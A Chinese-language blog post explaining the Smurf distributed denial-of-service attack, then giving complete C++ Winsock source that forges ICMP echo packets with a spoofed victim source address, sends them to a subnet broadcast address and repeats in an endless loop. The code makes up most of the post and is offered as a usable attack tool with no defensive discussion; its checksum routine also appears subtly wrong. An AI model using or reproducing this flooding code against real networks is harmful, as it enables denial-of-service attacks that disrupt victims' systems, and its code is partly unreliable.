本文介绍了Smurf攻击的工作原理,这是一种分布式拒绝服务攻击,通过伪造IP广播包导致目标系统流量泛滥。文中还提供了使用C++实现Smurf攻击的示例代码。
Smurf攻击是一种逼毒攻击,以最初发动这种攻击的程序“Smurf”来命名。这种攻击方法结合使用了IP欺骗和ICMP回复方法使大量网络传输充斥目标系统,引起目标系统拒绝为正常系统进行服务。(引自百度)
The Smurf attack is a distributed denial-of-service attack in which large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address. Most devices on a network will, by default, respond to this by sending a reply to the source IP address. If the number of machines on the network that receive and respond to these packets is very large, the victim’s computer will be flooded with traffic. This can slow down the victim’s computer to the point where it becomes impossible to work on.(引自google)
C++:
#include <stdio.h>
#include <string.h>
//#include <windows.h>
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")
#include <stdlib.h>
#include <Ws2tcpip.h>
struct iphdr
{
unsigned char vihl;
unsigned char tos;
unsigned short tot_len;
unsigned short ident;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};
struct icmphdr
{
unsigned char type;
unsigned char code;
unsigned short checksum;
};
/*unsigned short in_chksum (unsigned short *buf1,short len,int chksum,char complement)
{
unsigned short * buf=buf1;
int chksum16;
while(len>0){
if(len==1)
chksum16=((*buf)&0x00FF);
else
chksum16=(*buf);
chksum=chksum+htons(chksum16);
*buf++;
len -=2;}
if(complement)
return(~(chksum+((chksum&0xFFFF0000)>>16))&0xFFFF);
return chksum;
}*/
unsigned short in_chksum (unsigned short *addr, int len)
{
register int nleft = len;
register int sum = 0;
unsigned short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(unsigned char *)(&answer) = *(unsigned char *)addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
{
struct iphdr *ip;
struct icmphdr *icmp;
char *packet;
packet = (char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
ip->vihl=0x45;
ip->ident=1;
ip->ttl = 255;
ip->tos = 0;
ip->frag_off = 0;
ip->protocol = IPPROTO_ICMP;
ip->saddr= inet_addr("10.40.44.54");//dest; //攻击目标主机IP
ip->daddr= inet_addr("10.40.44.255");//sin.sin_addr.s_addr; //广播地址
ip->check = in_chksum((u_short *)packet, sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 0;
icmp->checksum=0;
memset(packet+sizeof(struct iphdr) + sizeof(struct icmphdr),0,psize);
icmp->checksum =in_chksum((u_short *)icmp, sizeof(struct icmphdr)+psize);//0x2119;
printf("%d \n",ip->tot_len);
sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
free(packet);
}
int main(int argc, char* argv[])
{
WSADATA wsd; //WSADATA变量
SOCKET sock; //服务器套接字
struct sockaddr_in servAddr;
unsigned long dest;
//初始化套结字动态库
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
printf("WSAStartup failed!\n");
exit(-1);
}
//创建套接字
/*sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(INVALID_SOCKET == sock)
{
printf("socket failed!\n");
WSACleanup();//释放套接字资源
exit(-1);
}*/
servAddr.sin_family =AF_INET;
servAddr.sin_addr.s_addr = inet_addr("10.40.44.255");
servAddr.sin_port = htons((short)0);
dest=inet_addr("10.40.44.55");
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) < 0) {
perror("getting socket");
exit(-1);
}
/* int Time =888;
if(setsockopt(sock,SOL_SOCKET,SO_SNDTIMEO,(char*)&Time,sizeof(Time))==SOCKET_ERROR)
{
return false;
exit(1);
} */
while(1)
{
smurf(sock,servAddr,dest,36);
printf("Send smurf\n");
Sleep(500);
}
return 0;
}
扫一扫
295
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
